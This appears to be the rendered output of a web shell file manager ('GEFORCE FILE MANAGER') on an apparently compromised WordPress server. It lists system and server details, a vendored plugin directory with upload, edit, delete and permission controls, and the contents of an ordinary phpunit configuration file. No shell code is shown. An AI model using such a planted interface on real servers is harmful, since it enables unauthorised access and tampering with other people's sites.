[ SYSTEM ]: Linux wordpress 6.1.0-41-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.158-1 (2025-11-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
wp-optimize
/
vendor
/
rosell-dk
/
webp-convert
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 src
SET
[ DEL ]
📄 LICENSE
1,070 B
SET
[ EDIT ]
|
[ DEL ]
📄 phpcs-ruleset.xml
308 B
SET
[ EDIT ]
|
[ DEL ]
📄 phpunit-with-coverage.xml.dist
1,022 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: phpunit-with-coverage.xml.dist
<?xml version="1.0" encoding="UTF-8"?> <phpunit xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="https://schema.phpunit.de/9.3/phpunit.xsd" backupGlobals="false" backupStaticAttributes="false" colors="true" convertErrorsToExceptions="true" convertNoticesToExceptions="true" convertWarningsToExceptions="false" processIsolation="false" stopOnFailure="false" bootstrap="vendor/autoload.php"> <coverage> <include> <directory suffix=".php">src/</directory> </include> <exclude> <directory>./vendor</directory> <directory>./tests</directory> </exclude> <report> <clover outputFile="build/coverage.clover"/> <html outputDirectory="build/coverage"/> <text outputFile="build/coverage.txt"/> </report> </coverage> <testsuites> <testsuite name="WebPConvert Test Suite"> <directory>./tests/</directory> </testsuite> </testsuites> <logging> <junit outputFile="build/report.junit.xml"/> </logging> </phpunit>